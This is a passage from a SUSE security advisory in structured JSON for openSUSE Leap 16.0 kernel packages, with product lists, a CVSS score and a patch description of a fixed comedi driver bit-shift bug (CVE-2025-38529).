"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38521"
},
{
"cve": "CVE-2025-38529",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38529"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: aio_iiro_16: Fix bit shift out of bounds\n\nWhen checking for a supported IRQ number, the following test is used:\n\n\tif ((1 \u003c\u003c it-\u003eoptions[1]) \u0026 0xdcfc) {\n\nHowever, `it-\u003eoptions[i]` is an unchecked `int` value from userspace, so\nthe shift amount could be negative or out of bounds. Fix the test by\nrequiring `it-\u003eoptions[1]` to be within bounds before proceeding with\nthe original test. Valid `it-\u003eoptions[1]` values that select the IRQ\nwill be in the range [1,15]. The value 0 explicitly disables the use of\ninterrupts.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38529",
"url": "https://www.suse.com/security/cve/CVE-2025-38529"
},
{
"category": "external",
"summary": "SUSE Bug 1248196 for CVE-2025-38529",
"url": "https://bugzilla.suse.com/1248196"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
